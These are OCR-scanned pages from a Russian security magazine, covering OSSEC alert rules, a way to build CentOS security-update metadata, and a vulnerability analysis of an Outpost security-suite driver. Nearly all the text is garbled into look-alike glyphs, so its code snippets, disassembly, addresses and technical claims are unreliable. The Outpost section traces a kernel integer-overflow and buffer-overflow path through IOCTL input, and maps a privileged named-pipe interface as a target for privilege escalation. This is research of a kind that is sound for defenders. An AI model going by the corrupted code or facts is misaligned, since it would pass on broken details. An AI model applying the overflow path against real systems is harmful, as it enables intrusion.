<Ј-Ғ 5Јс1>57ӨӨ</Ј-Ғ 5ЈсЈ> 



<ша"Ссһ> л Ассер"сес1 1 аи"СһеггС1са"сес1 . $</ша"Ссһ> 
^сЈе^сг^р^огоББНО аи^сһеггс^са^оп 5исс е55 
</6езсг1р-\:1ог\> 
^<_гоир>аи1:һеп1:1са1:10п_5иссе55Ј</§гоир>^ 
</ги!е> 



Теперв достаточно, чтобы лог совпал с регул^рным выражением, которое указа- 
но в разделе <шат_сһ>, и мы получим сигнал тревоги 4-го уровн^ с текстом «55Н0 
аи.һеп.Јса.Јоп зиссезз». Даваи немного усложним второе правило. Допустим, мы 
не хотим получатв сигнал тревоги при каждом успешном входе по 55Н, а хотим по- 
лучатв его, толвко если вошел полвзователв гоо.. Достаточно добавитв к нему еиде 
одно условие: 

<ги1е 1с1="5715" 1еуе1= "4"> 
<Ј-Ғ_5Јс1>57ӨӨ</ Ј-Ғ_5Јс1> 
<115ег> госгЕ</и5ег> 

<ша1:сһ> л Ассер1:ес1 1 аи^һегтЫса^ес! . $</ша1:сһ> 

<с!е5СГЈр1:Јо п>55НР аиЈһе ггЫс аЈЈоп -Ғог гоо1: 5и ссе55 . </с!е5сгЈр1:Јоп> 
<§гоир>аи"сһеггсЈса"сЈоп_5иссе5 5Ј </§гоир> 
</ги1е> 

Таким образом, в правилахты можешв исполвзоватв не толвко регул^рные выраже- 
ни^, но и значени^ переменных, которые были извлечены в декодере. 




<с!есос1ес1_а5>55һс1</с1есос1ес1_а5> 



ги1еЈс1="5715" 



<пла.сһ> л Ассер.ес! | аи.һеп.јса-ес!.5</пла.сһ> 




Воо. 




А1ег* 

55Н0 аиШеписа^оп Тог 
гоотзиссезз 




тооо 



К сожаленикз, в рамках однои статви просто нереалвно рассмотретв все возмож- 
ности зтого замечателвного инструмента. ^ рассказал лишв про базовыи функи,и- 
онал 055ЕС, как его настроитв и где исполвзоватв, чтобы ты мог самосто^телвно 
построитв неболвшои «заборчик» вокруг своеи сети. Но если 055ЕС тебе понравит- 
с^ и ты решишв с его помоидыо возвести иелукз «крепостнукз стену», то тебе стоит 
самосто^телвно изучитв следукзидие веши. 1Дентрализованное управление агента- 
ми с помоидыо фаила а§епт_. соп-Ғ. Об^зателвно разберисв с предназначением всех 
осталвных бинарников в папке /уаг/озБес/Ып: а§епт__сопт_го1 позвол^ет выполн^тв 
простеишие операи,ии судаленными агентами, о55ес-1о§т_е5т_ поможеттебе при на- 
писании своихсобственных правил и декодеров дгт 055ЕС, а о55ес-герогт_с1 сдела- 
ет кумул^тивные отчеты по логам 055ЕС. 

До новых встреч, дорогие друзыз, и удачи в зашите инфраструктуры! I 



Взлом 



КОЛОНКА 
АЛЕКСЕ^ СИНиОВА 
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МЕНЕДЖМЕНТ 
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РЕШАЕМ ПРОБЛЕМУОТСУТСТВИЛ 
ИНФОРМАиИИ 0 ЗЕСУН1ТҮ-АПДЕИТАХ 





АЛЕКСЕИ СИНДОВ 

Известныи мһИе Һа1, докладчик 
назесип1у-конферени,и^х, соорга- 
низатор 2егоМЈдһ15 и просто отлич- 
ныи паренв. В данныи моментза- 
нимаетдолжноств Рппфа! 5есип'1у 

Епдтеег в компании 1\1окЈа, где 
отвечаетза безопасноств сервисов 
платформы НЕРЕ. 



Многиө лкзбдт исполһзоватһ СепЈОЗ в качөствө сөр- 
вөрнои платформы. В какои-то момөнт встаөт вопрос 
о контролө бөзопасности, в том числө контролө ап- 
дөитов бөзопасности, по^вл^һотс^ проблөмы мөлкого 
төхничөского характөра. В частности, нөлһз^ просто 
так вз^тв и внөдритһ Зрасө\л/а1к/За1өШ1ө, или просто 
запуститв уит — зөсигИу, или тупо получитв список 
пропуш,өнных сөкурити-патчөи. Впрочөм, иәтапро- 
блөма рөшаөтс^ просто... 



ИСТОЧНИК ПРОБЛЕМЫ 

Как мы знаем, Сеп1:05 — зто дистрибутив всеми лкзбимого Ыпих, которыи основан 
на ВНЕ1_, но отличаетс^ от него бесплатностыо. Таким образом, все те, кто хотел бы 
иметв Вес! На1:, но не хочет платитв «за поддержку» и прочие веиди, могут легко по- 
ставитв Сеп1:05 и наслаждатвс^ тем же резулвтатом за менвшие денвги. Әто все здо- 
рово, но все же мелкие обломы прикхиочакзтс^, и один из таких скзрпризов св^зан 
как раз с безопасностыо. 

Покажу живои пример. Итак, мы хотим проверитв неустановленные ЗесигИу 
11рс!а1:е5 в свежеустановленном Вес! На1:. Что мы делаем? Правилвно: 



уиш --зесигЈ-Еу сһеск-ирс1а1:е 

В резулвтате мы увидим список неустановленных зесипгу-патчеи. 

Но вот незадача, то же самое деиствие на таком же «устарелом» Сеп1:05 дает дру- 
гукз картину: 



[гоо"с@1р-10-37-162-2Ө Ш5р]# уиш --5есиг1ту сһеск-ирсЈате 
1_оас1ес1 р1и§1П5: -Ға5"се51:т1ггогЈ пок1а-53уит., 5есигИ:у 
0е"сегт1П1п§ -Ға5"се5Т тЈггог5 

ИтЈтЈп ^ раска§е 1Ј5Т5 то 5есигЈту ге1еүаггс опе5 

N0 раска§е5 пеес1ес1 -Ғог зесигИгу.^Ј^ раска§е5 ауаПаЫе 



То еств нам говор^т, что пропуиденных патчеи безопасности нет, но әто не так. Ну 
и вот как тут внедр^тв систему патч-менеджмента? Получаетс^, даже стандартныи 
Вес! На1: 5расе\л/а1к (система дл^ инвентаризаи,ии и мониторинга, в том числе и пат- 
чеи безопасности) бесполезен. Әто обидно и непри^тно. Әта же тема поднималасв 
не раз в комыонити СепК)5, и каждыи раз ответодин: не поддерживаетс^ така^ фича, 
и все тут. 



ЗесигНу Егга1а рег топ1һ 
Рес! На1 Еп1егрп8е Ыпих 5 5еп/ег Ое1аи\\ 1пз1аМ 
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Все проблемы Рео! На* 
наследует и СепШБ. 
Статистика багов 
по релизам РН 



1Н1ҺЧ1 

5.0 5.1 5.2 5.3 5.4 5.5 5.6 5.7 5.8 5.9 

Мос!егаТе/1_о\л/ 1ппрогТап1: I СгШса! 

РЕШАЕМ ПРОБЛЕМЫ САМИ 

Причина проблемы в том, что в отличие от ВНЕ1_ в репозитори^х СепТ05 нет метадан- 
ных о патчах, о том, ^вл^етс^ ли данныи патч ЗесигИу, ВидҒЈх, ну и так далее. В итоге 
мы имеем просто набор патчеи и никак не можем иххарактеризоватв с точки зрени^ 
безопасности. Если заити на репо Сеп1:05, то можно заметитв, что фаила ирс1а1:еЈпТо. 
хт1 там вообиде нет. Именно әтот ресурс и необходим, ведв в нем содержатс^ нуж- 
ные метаданные. Таким образом, решении может бытв несколвко: 

1 . Если у нас еств доступ/подписка Вес! На1: Ые1:\л/огк, то мы можем сгенерироватв 
зтот фаил на основе фаила из репо Вес! На1:. 

2. Мы можем генерироватв ирс!а1:еЈпТо.хпл1 самосто^телвно, а информаи,икз о мета- 
данных вз^тв из листа рассылки СепТ05. 

3. Мы можем создатв локалвныи скрипт, не исполвзукзидии уит, но обраидатвс^ 
к нему дгт получени^ установленных пакетов, а затем сравниватв версии с тем, 
что еств в листе рассылки СепТ05. То еств 5расе\л/а1к/Вес! НаТ 5аТеШТе в пролете 
по умолчаникз. 

Решени^ 1 и 2 подразумевакзт, что у нас должен бытв свои собственныи репозито- 
рии — дгт болвших и средних компании нормалвное и частое решение. Толвко с ва- 
риантом 1 мы тратим денвги, посколвку нам нужна подписка, — а тогда почему мы 
не исполвзуем ВНЕ1_? Вариант 3 годитс^, если у нас нет своего репо и мы хотим че- 
катв пропушенные секурити-фиксы на наших серверах. Третии вариант подразуме- 
вает написание своего «агента», тогда как вариант 2 (ну и 1 ) — толвко парсинг и ге- 
нераи,икз фаила дл^ репо. Таким образом, вариант 2 наиболее выгодныи. Все әти 
решени^ очевидны и не новы. Еств множество решении дл^ всех вариантов, и если 
погуглитв, то ты их наидешв. Другои вопрос, что лкзди ва^ли их дгт себ^ конкретно, 
и придетс^ либо допиливатв, либо делатв самому. Например, еств такое решение: 
сеТз.зТеуе-теЈег.сЈе . Реб^та парс^т меил-лист и сразу делакзт фаил дгт 5расе\л/а1к. По- 
әтому другие парни сделали скрипт, которыи генерирует ирс!а1:еЈпТо.хпл1 уже из фаи- 
ла СЕҒ5-проекта. Все әто доволвно забавно, если подуматв. Тут мы встаем в зави- 
симоств от двух проектов. Поәтому все же проиде парситв фаил рассылки самому 
и генеритв әту чертову ХМ1_'ку уже. 

ПАРСИМ, ПАРСИМ, ГЕНЕРИМ 

Сами меил-листы можно наити тут . Как видно, их можно удобно скачатв в виде за^ 
архивированных почтовых сообшении за каждыи мес^и,. Реализаии^ зтого кода, на- 

ППММРП нд Р\/1һпп НР ПППЖНЛ ППГТДВМТк тп\/пд Чтпж ЧДПТк ПРПД МП¥НП ГКДГЧДТ!-, ГПР- 
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лана. Теперв можно и парситв скачанные фаилы (после распаковки, конечно). Чтобы 
не перегружатв код, все отделвные сообидени^, вклкзча^ темы писем, можно распар- 
ситв, исполвзу^ модулв плаПоох, а в третвем питоне можно сразу парситв через мо- 
дулв еплаП: 

ге§ех_СЕ5А=ге . сотрИе ( "СЕ5А-\5+") 

ге§ех_грт = ге. сотрЈ1е( " ( [а-2А-2Ө-9\-\ ._]+\ . (\м+)\ . грт) ") 



те55а§е5ҒогМоп1:һ = та11оох.тоох(ра1:ҺТоҒ11е) 
-Ғог Ш5§ 1П те55а§е5ҒогМо п1:һ : 

п.-Ғ(ге§ех_СЕ5А. 5еагсһ(т5§[ ' 5иојес1: ' ] ) ) : 

# Обрабатываем 5есигЈ1:у-патч 

Ј55ие_Јс!=ге§ех_СЕ5А. 5еагсһ(т5§ [ ' 5иојес1: ' ] ) . §гоир(Ө) 

# Достаем КРМ, например: 
грт_И51:={} 

ге5и!1 :5=ге§ех_грт.-(1Пс1а11(т5§.§е1:_һос1у() ) 
-Ғог пате Јп ге5и!1:5: 
1-Ғ пате[1] 1п грт_115"с: 

грт_И51:[пате[1] ] . аррепс1(пате[2] ) 
е!5е: 

грт_И51:[пате[1] ] = [ ] 
грт_Н51:[пате[1] ] . аррепс1(пате[2] ) 

Логика в том, что мы обрабатываем толвко те сообидени^, где в теме указано непо- 
средственно СЕ5А, так как именно зтои аббревиатурои характеризукзтс^ все сообиде- 
ни^, св^занные с безопасноствкз. Там же в теме передаетс^ и уровенв риска, и обш,ее 
название пакета. Все зто так же легко достаетс^ из почтового сообидени^. Теперв, 
когда пон^тен подход к парсингу, нужно пон^тв, как формироватв ирс!а1еЈпТо.хт1. 
Собственно формат фаила доволвно банален: 

<ирс1а1:е5> 

<ирс!а1:е ^гош ^^ПОЛЕ^ҒКОМ" 51 :а1:и5= "51:аЫе" 1:уре= "5есигЈ1:у" уег5Јоп ="1 .4"> 
<Ј(Ј>%155и Е_1Р</Ј сЈ> 
^±Ше>%ЗАГ0Л0В0К</±1±1е> 
^<ге1еа5е>Сеп1:05 %ВЕРСИЖ/ге1еа5е>^ 

<Ј55иесЈ с !а1:е="%ДАТА" /> 
^<ге-Ғегепсе5>^ 

<г е~Ғегепс е 1:Ј1:1е="ир51:геат" 1:уре= "5е1-Ғ" һге-Ғ="%ССЫЛКА"/> 
^</ге-Ғегепсе5>\п"^ 
<сЈе5сгЈр1:Јоп>1М/А</с1е5сгЈр1:Јоп> 
<5еуегиу>%КРИТИЧН0СТҺ</5 еуегЈ1:у> 
< р к§1Ј51:> 

<со!1ес1:Јоп 5 һог1:= "Е1.-%ВЕРСИЛ"> 
<паше>Сеп1:05 %ВЕРСИЖ/пате> 

<раска§ е агсһ="%АКСН" еросһ="Ө" пате="%ИМ^" ге! еа5е ="%РЕЛИЗ" <- 
5гс="" у ег5Јоп="%В ЕРСИЛ ПАКЕТА"> 



<т11епате>%КРМ</т11епате> 
<5ит ^:уре="%ТИП_Чек_СУММЫ">%СУММА</5ит> 
</раска§е> 
</со !1ес1: Јоп> 
</рк§1Ј51:> 
</ирсЈә1:е> 



</ирс1а1:е5> 

Все переменные, вклкзча^ хеши и имена фаилов, достакзтс^ и парс^тс^ из писвма, 
так что иде^ и подход должны бытв пон^тны. После генераи,ии фаила кидаем его 
в наше /геро, и дело в шттпе. Резулвтат можно посмотретв на скриншоте. Таким же 
манером можно доставатв и внедр^тв в наш ирс!а1:еЈпТо.хпл1 более подробнукз инфу 
и детали и по багфиксам и прочим типам патчеи (если оченв уж надо). Генеритв фаил 
можно так: 



АтрогС хт!.е"сгее. сЕ1етеггсТгее а5 ЕТ 
гоот_ =ЕТ. Е1етепт_ ( ' ирс!а1:е5 ' ) 

# -Ғог . . . 

# парсим 

^ » » » 

# пишем 

ирс! = ЕТ. ЗирЕ^етеп-с^гоо- СЈ "и рсЈа1: е") 
ирс! . 5ет ("-Ғгот" ,т5§[ '-Ғгот' ] ) 

ирсЈ.5е1:(" 5тати5" Ј "5таЫе") 

ирсЈ . 5ет( "туре" , "5есигјт_у") 
ЈЈрсЈ . 5е т( "уег5Јоп" , "1.4") 
1с1 = ЕТ. 5иһЕ1етепт(ирс1Ј "Јс1" ) 
п.с1 .т_ехт_=15 5ие_1с1 

# и т. д.ј и т. п. в |дикле 

В обшем, иде^ ^сна. Реализаи,ии своеи п не дам, потому что жадныи, но особого тру- 
да закодитв тут нет. Такои подход дгт организаиии своих репо исполызукгг многие 
реб^та, кому приходитс^ т^нутв системы на основе СепТОЗ. Собственно, минус тут 
толвко один: если формат почтовои рассылки помен^етс^, то придетс^ допиливатв. 
Но пока такого не было, так что можно считатв, все ОК. 
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Сутв проблемы 
своими глазами: если 
загллнутв в репо СепШ5, 
то ирсЈа^еЈп^о.хт! там 
не наити... 
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Работагошее решение 
в отделвно вз^тои 
компании: свои 
репозитории, свои 
метаданные! 



В которыи раз мы уже говорим о такои штуке, как патч-менеджмент. Казалосв бы, про- 
ста^ задача, но если не бытв «бумажником», то видно, что еств много тонкостеи. В одном 
из прошлых выпусков мы говорили о разработке архитектуры и контроле за патч-ме- 
неджментом с исполвзованием таких инструментов, как 5р1ипк и Рирре!:, а вот сегодн^ 
коснулисв мелкои техническои, но доволвно забавнои проблемы. Как видишв, инже- 
неру ИБ приходитс^ решатв от глобалвных и архитектурных до мелких технических за- 
дач, без которых сложно развиватв здоровукз и безопаснукз систему и инфраструктуру. 
Как мы понимаем, система «слежени^» за обновлени^ми — уже полдела, но ведв еств 
и организаиионные проиессы, которые должны бытв выстроены. Патчи нужно ставитв, 
и ставитв воврем^. Поәтому кроме техническои стороны дела в компании должны по- 
ниматв необходимоств обновлении безопасности. Тутуже могут резвитвс^ «бумажные» 
безопасники, придумыва^ регламенты и вс^кие прочие проиддуры, и чтобы у них там 



оыл «комплаенс» :). 

Всем при^тного дн^ и да пребудет с тобои Сила 



Взлом 




Небезопасна^ 
безопасностһ * 



СЛАБЫЕ МЕСТА СОВРЕМЕННЫХ 
СРЕДСТВ ЗАШ.ИТЫ 

В наши дни доволһно трудно наити компвнзтер 
бөз установлөнного зесипЈу-решенил, обеспечива- 
гОш,его безопасностһ кззеру. Сами заш,итные реше- 
ни^ — әто неплохо, но минус таких программ в том, 
что полһзователи полноствно полаганотс^ на них и те- 
рднот бдителвностһ. А зрд. Ведһ современные анти- 
вирусы, фаирволы и прочее — оченһ сложные про- 
граммные продукты, в которыхтоже присутствукзт 
у^звимости. И сегодн^ мы рассмотрим, где ихлучше 
искатһ и к чему они могут привести. 



> Марселв Валеев 

1агдо1ек@дтаЈ1.сот 

ВЫБОР ПАЧИЕНТА 

Все программные продукты, предназначенные дгт обеспечени^ безопасности ПК, 
решакзт приблизителвно один и тот же круг задач. Позтому в какои-то мере они по- 
хожи друг на друга — какс архитектурнои точки зрени^, так и сточки зрени^ алгорит- 
мов. Сегодн^ мы выберем одного подопытного и на его примере рассмотрим, какие 
у^звимости могут таитвс^ в зесипт.у-продуктах и что они могут датв злоумышленни- 
кам. В качестве паи,иента возвмем АдпЈШпл Ои1роз1. 

Ои^роз^, как и другие похожие продукты, — әто пакет программ, наи,еленных 
на заидиту полызовател^, в данном случае антивирус, фаирвол, антиспам, песочнии,а 
и другие компоненты. Один из клкзчевых моментов зесип1:у-продуктов — они должны 
прежде всего бытв зашишены сами по себе, дабы не предоставл^тв зловредам до- 
полнителвные двери в систему. Сегодн^ мы будем рассматриватв, наверное, одни 
из самых важных и у^звимых мест (по краинеи мере которые всегда под прии,елом 
у злоумышленников) — песочнииу и непосредственно архитектуру зесип1:у-решени^ 
и попробуем наити баги и проәксплуатироватв их. 

УСТАНОВЛЕННЫЕ АНТИВИРУСНЫЕ ДРАИВЕРЫ 

Послеустановки последнеи версии Ои^роз! получаем список драиверов, установлен- 
ных әтим пакетом, и их пермишены с помоидыо инструментов ОшегҮ^еш и ОеуЈсеТгее. 




N0 0г1УегМаше иеүл.сеМате Јегш15510п ие5сг1р-1:10п 

1* а-Ғш а-ҒыпсИв ас1тЈпЈ51:га1: ог5 А_тт:ит ^геыаИ 

пс115 (Јг јуег 

2* а-Ғысоге а-Ғы Еуегуопе А§тт:ит ҒЈгеыаП 

соге с1г1үег 

3* 5апс1оох 5апс1оох Еуегуопе Н051: р гот:ес1 :Јоп 

сотропеггп^ 

4 \/ВСоге1\1Т.0^ \/ВСоге1\1Т.0^ Еуегуопе УЈги 5Ви5"сег соге 

(Јг јуег 

5* \/ВЕп§1\1Т уоеп^пт: Еуегуопе УЈги 5Ви5"сег 

1оас1ег 5 у5 

6* УВҒПт: ... ... Н051: р гот:ес1 :Јоп 

сотропепт: 



Что мы видим? АТ\л/5 — әто ТЈге\л/аИ-технологи^, разработанна^ АдпЈТигп, которукз так- 
же исполвзукзт другие антивирусные вендоры. Драиверы \/В* отвечакзт за движок 
УЈшзВизЈег, недавно приобретенныи АдпЈТигп. Драивер песочнии,ы запс1һох.5у5, ко- 
торыи ^вл^етс^ неотвемлемои частыо механизма заидиты. Песочниид достаточно 
сложныи компонент, потени,иалвно содержаидии баги, поиски начнем с него. 



8АЫОВОХ.ЗҮЗ 

Данныи драивер обрабатывает различные ЈосТ1-запросы, повесив 1РР_МЈ_0Е\ЛСЕ_ 
С0ЫТР01_ на функи,ик) зиһ_55020. То еств 5иһ_55Р20 будет обрабатыватв запросы, ко- 
торые идут драиверу. Данна^ функи,и^ ^вл^етс^ оберткои дл^ зиһ_А1 Ғ90, а она, в свокз 
очередв, передает ЈосТ1 коды и параметры различным функи^/тм-обработчикам. 

В первом блоке каждои функи,ии обработчика код ЈосИ провер^етс^, и в случае 
неравенства код и параметры передакзтс^ следукзидему обработчику. Әти ЈосИ-коды 
посылакзтс^ от песочнии,ы и исполызукзтс^ модулем запсЈ.оТр, которыи представл^- 
ет собои фаил динамическои библиотеки и лежит в . . а_пИ:ит/0и"1:ро51: 5есиг11:у 
5иИ:е Рго/р1и_дп5_ас5/5апс1 . о-Ғр. Открываем в иде данныи плагин. Там еств функ- 
и,и^ 5ио_1004ОС40, котора^ обрабатывает ЈосИ-коды и выводит отладочные сообиде- 
ни^, что поможет нам разобратвс^, что к чему. Всего исполвзуемых ЈосИ-кодов ока- 
залосв 31 , вот парочка из них. 



0x80000208 : "5е1: ги!е5" 
0Х80ӨӨ020С: "§ ет: ги!е5" 
0x80004198: "диегу јпјт. Јп-Ғо2" 

Как видишһ, достаточно болвшои фронт дгт исследовани^ и поиска дыр. После игры 
с некоторыми из әтих значении, отправл^^ сообидени^ драиверу и анализиру^ буфе- 
ры ввода-вывода и их размеры, натыкаемс^ на интересныи ЈосТ1-код — 0x80000208: 
"5еТ: ги1е5". Выпгтдитзаманчиво, даваи поближе рассмотрим его и проследим путв 
прохождени^ входных данных. 
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ПУТВ ПРОХОЖДЕНИЛ БУФЕРА 

На первыи взгллд кажетс^, что буферы , выделенные дл^ сообидени^ прин^того ЈосН-ко- 
да, корректно провер^котс^ — входнои не менее 20 баит, а выходнои не менее 144. 



.•Еех"Е:ӨӨӨА1827 са!1 5ио_92СҒӨ ; Выделлет памлтв и копирует туда входные 



данные 
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1АВ20 : Выделлет памлтв и копиоүет түда выходные 


данные 



Далее идут магические проверки, на какие-то баиты. После всехзтих проверок, долж- 
ным образом проиденных, мы достигаем адреса 0хА18ЕҒ, где вызываетс^ функи,и^ 
5иһ_А12С0, отвечакзида^ за установку правил в антивирусе. Данные правила берутс^ 
из фаила и считывакотс^ функи,иеи 5иЕ>_62А50, котора^ анализирует фаил и забира- 
ет правила. После функии^ 5иЕ>_9Е0Е0 устанавливает полученные правила. Наконеи,, 
пропуска^ несуидественные моменты, достигаем функи,ии 5иһ_627В0, котора^ начи- 
нает анализироватв правила из входных данных. Сперва считывакотс^ 4 баита сиг- 
натуры, которые должны бытв равны 0Х0000ВЕЕВ. Затем провер^етс^ другои двух- 
баитовыи флаг на равенство 0x1. После чего дважды вызываетс^ функии^ 5иЕ>_510А0 
и провер^ет наличие баита-флага на равенство 0x1. После ини1диализа1дии некото- 
рои структуры (дл^ нас она никакои роли не играет) функиут вызывает 5иЕ>_50ҒЕ0 
дл^ анализа еиде несколвких значении. В итоге буфер ЈосИ-обработчика достигает 
функ1дии 5иЕ>_22ЕО0, котора^ принимает коникоднуко строку, и работает с неи. Затем 
әта строка копируетс^ в пам^тв, после чего передаетс^ в функ1дико 5иЕ>_1ҒСВ0, кото- 
ра^ представл^ет собои своего рода распределителв пам^ти дл^ коникоднои строки. 



УЛЗВИМОЕ МЕСТО 

У^звимыи код пр^четс^ именно тут. В әтои функи,ии находитс^ р^д некорректных 



проверок, которые и приводғгг к переполненикз. Функи,и^ 5ио_1ҒСВ0 делает воттакои 
расчет дгт размера выдагтемои пам^ти: 
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1ҒР58 ; Неверныи прыжок 



Здесв значение длины строки в регистре есИ умножаетс^ на два, и если по^вл^- 
етс^ иелочисленное переполнение, то в регистре еох устанавливаетс^ значение 
Өх-Ғ-Ғ-Ғ-Ғ-Ғ-Ғ-Ғ-Ғ и затем производитс^ операии^ ОК дгт ӨхҒҒҒҒҒҒҒҒ с резулвтатами умно- 
жени^. Если резулвтат не равен нулкз, то происходит прыжок в ту частв кода, где вы- 
дагтетс^ пам^тв. Так что в случае болвшого значени^ программа пытаетс^ выделитв 
пам^тв размером ӨхҒҒҒҒҒҒҒҒ. 

.-сех1::ӨӨӨ1ҒР58 ри5һ '90В5' ; Та§ 
.1:ех1::ӨӨӨ1ҒР5Р ри^һеох ; 1\1итрегО-ҒВу1:е5 
.1:ех1::ӨӨӨ1ҒР5Е ри5һ0 ; Роо1Туре 
.1:ех1::ӨӨӨ1ҒР6Ө са!1 сЈ5 : Е хА11оса1:еРоо11л1 Ј1:ҺТае 
.1:ех1::ӨӨӨ1ҒР66 јез* еах, еах 

Так как невозможно выделитв пам^тв такого размера, то ЕхАИосаЈеРооШШТад воз- 
врашает пиИ. Но разработчик прин^л неверное решение — в случае отказа функи,ии 
ЕхАИосаЈеРооШШТад выдагттв пам^тв из предварителвно зарезервированнои па- 
м^ти. Поәтому происходит вызов функ1дии по адресу 0х16ЕВ0, котора^ возврашает 
участок предварителвно зарезервированнои пам^ти. Именно в неи и находитс^ вто- 
рои баг — она не провер^ет надлежашим образом об^ем запрашиваемои д/т выде- 
лени^ пам^ти. 

.1:ех1::ӨӨӨ16ЕРС стр еах, 1000Һ 
.-сех1::ӨӨӨ16ЕЕ1 јпг 5һог1: 1ос_16ЕЕ6; В1166Ү 

Таким образом, передава^ значение ӨхҒҒҒҒҒҒҒҒ даннои функи,ии, мы в итоге полу- 
чаем вот зтот код: 

.1:ех1::ӨӨӨ16ҒӨЕ шоу еах, [еор+аг§_0] 
.1:ех1::ӨӨӨ16Ғ11 ри5һ еах 
.1:ех1::ӨӨӨ16Ғ12 1еа есх, [е5Ј+0 А0һ] 
.-сех1::ӨӨӨ16Ғ18 са!1 5ио 1 1140 



Функии^ 5ио_11140 возврашает выделеннукз ранее и неисполвзуемукз пам^тв (но 
может слүчитбс^ так. что об^ем окажетс^ недостаточно болвшим). Пам^тв оезеови- 



руетс^ при загрузке драивера с вызовом функи,ии 5ио_1ОҒ60. Самыи болвшои кусок 
пам^ти, которыи может бытв выделен, — 16Ғ000Һ баит. 

.1:ех1::ӨӨӨ1РҒ9Е ризһ 16Е36ӨҺ; мШ һе а1Ј§пес! *о 4к -> 16-ҒӨӨӨ 

Таким образом, переполн^^ кзникод-строку, мы получаем пам^тв размером 0х16Ғ000 
баит. Третыз и последн^^ проблема возникает, когда кзникодные данные копирукггс^ 
в пам^тв. После получени^ указател^ на пам^тв размером 0х16Ғ000 баит функи,и^ 
5ио_22ЕО0 пытаетс^ копироватв данные в зтот буфер. 

.1:ех1::ӨӨӨ22Ғ2Р 1еа есх, [е сЈЈ+есЈЈ ] ; Нет проверки на переполнение 

.1:ех1::ӨӨӨ22ҒЗӨ ризһ есх 

.1:ех1::ӨӨӨ22Ғ31 ризһ е5Ј 

.1:ех1::ӨӨӨ22Ғ32 шоу есх, еһх 

.1:ех1::ӨӨӨ22Ғ34 са!1 5иһ 1 Ө71Ө 



На әтот раз функи,и^ умножаетзначение длины (1еа есх^ есИ+есИ () без каких-либо 
проверок. Поәтому если мы передадим, например, значение 0x80100000 в качестве 
длины кзникод-строки, то получим указателв на пам^тв размером 0х16Ғ000, котора^ 
была выделена ранвше. А при вычислении размера копируемых данных получитс^ 
0x80100000 * 2 = 0x200000 баит. При копировании данныхтакои длины произоидет 
переполнение буфера размером 0х16Ғ000 баит. Вот и перва^ у^звимоств. 

ЗКСПЛУАТАЧИЛ 

К сожаленикз, әксплуатаии^ у^звимостеи выходит за рамки нашеи статви — мы лишв 
пытаемс^ихидентифи1дироватв. ПоәтомуссопсерЈ-әксплоитом, которыибудетждатв 
теб^ на с!ус1.хакер.ги , тебе придетс^ ознакомитвс^ самому. Сутв әксплоита такова: 
по правилам, рассмотренным выше, формируетс^ строка, содержаида^ длинное со- 
обидение, далее отправл^етс^ драиверу при помоиди функи,ии 0еУ1се1оСопт_го1(). 
Чисто теоретически можно переписатв точныи размер буфера. Но буфер выдел^ет- 
с^ при загрузке системы (точнее, драивера песочнии,ы, что часто одно и то же). Поә- 
тому извлечв какукз-то полвзу из даннои у^звимости будет доволвно непросто. 

АНАЛИЗ АРХИТЕКТУРЫ 

Теперв даваи попытаемс^ проанализироватв архитектуру продукта, чтобы лучше по- 
н^тв его структуру и потени,иалвно у^звимые места. Программа исполвзует основ- 
нои сервис асз.ехе, которыи ^вл^етс^ службои, работакзидеи с правами системного 
полвзовател^. Вс^ работа с интернетом идет через әту службу, котора^, в свокз оче- 
редв, взаимодеиствует с различными компонентами. 

Еств три клиента дгт службы асз.ехе. Первыи — Јеоаг, расширение дгт 1п1егпе1: 
Ехр1огег, которое позвол^ет настроитв контентнукз филвтраиикз при интернет-сер- 
финге. Следукзшее — ор зһеИ, расширение дгт ехр1огег.ехе. И орплоп — 01)1 про- 
граммы. Все әти три компонента запускакзтс^ с привилеп/тми обычного полызо- 
вател^ и взаимодеиствуктг с более привилегированнои службои, исполвзу^ паип 
асзЈрсзеп/ег. В свокз очередв, асз.ехе работает с другими модул^ми, а также взаи- 
модеиствует с драиверами через интерфеисы плагинов. 



АС5_1РС_ЗЕНУЕН 

Так как сервис асз.ехе (адпИ:ит сПеп! зеплсе) работает с правами системного полв- 
зовател^, то, если проәксплоититв әтот проиесс, можно будет подн^тв свои привиле- 
гии в системе. Обычно системные проиессы получакгг от полвзователвских какие-то 
данные: записи из реестра, фаилы или сетевои трафик, что может бытв потени,и- 
алвным местом дл^ атаки. Мы остановили свое внимание на паипе асзјрсзеп/ег, 
потому что многие функи,ионалвные возможности продукта исполызукзт именно его 
в качестве интерфеиса дл^ взаимодеистви^ и можно предположитв, что где-то тут 
зарылс^ баг, которыи мы сможем исполвзоватв. 

Асз.ехе регистрирует паип и позвол^ет взаимодеиствоватв через него. Функии^ 
5иһ_4Ғ7580 из ас5 . ехе отвечает за чтение данных из указанного именованного кана- 
ла, другими словами — обработка переданных данных начинаетс^ отскзда. Она счи- 
тывает первые 40 (28Һ) баит как заголовок. Затем получает из заголовка размер дан- 
ных, и функ1ди^ по адресу 0x421680 считывает данные. 

Описание анализа структуры заголовка заимет много места и не укладываетс^ 
в формат статви. Кратко опишем обидукз идекз. Функии^ вызывает обработчик вот 
в зтом коде. 
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Әто динамическии вызов функи,ии обработчика, которыи передает сообидени^ раз- 
личным интерфеисам. Дл^ того чтобы достичв әтого места, обида^ структура заго- 
ловка должна бытв такои: 



СШзе! 5Јге ОезсһрНоп 

ӨхӨӨ Өх1Өрусе Сип.с1 обработчика зтои команды 

0x10 Өх4русе Номер команды 

0x14 Өх4ру1:е Не исполвзуетсл 

0x18 Өх4ру1:е Длина данных 

Өх1с Өх4ру1:е Должно бытв Јд^ 

0x20 Өх4ру1:е Должно бытв Јд^ 

0x24 Өх4ру1:е Должн о бытһ 0 



Асз.ехе исполвзует уникалвные Ө1Ш дл^ работы с различными плагинами. Он иидет 
зарегистрированные плагины по их уникалвному Ө1Ш и передает сообидение соот- 
ветствукзидему плагину. После әтого плагин исполвзует номер команды, чтобы ре- 
шитв, какои функ1дии әто сообидение адресовано, и анализирует полученные дан- 
ные. Проанализировав код и поискав Ө1Ш, можно составитв такукз таблииу гуидов 
и их интерфеисов. 



ӨС31Е1Ғ8С 4Ө85ЕВСҒ РЕ788597 Р8А239ЕР 
164789с27 48555-Ғео 9ҺЗасЈ7һ9 963еЗасЈ8 



п е-с 5 "с а т__1дс_һ а п с! 1 е г 
с1оып1оас1ег.о-Ғр 



2 9оесһ64һ 424е-Ғ2-ҒсЈ 6сӨ7е4аӨ с8е-Ғ8633 

Зс8ес9Ө4Ө 469364сЈ8 ЗһсЗӨҺ8Ө -ҒсЈс1932с16 

4а2-Ғ54сЈ27 433һ9а4-Ғ 9еһһЗа8 с 5сс-Ғ54еЗ 

5Р48А445Е 466Е1597 327416ВА 68ССРЕ15 



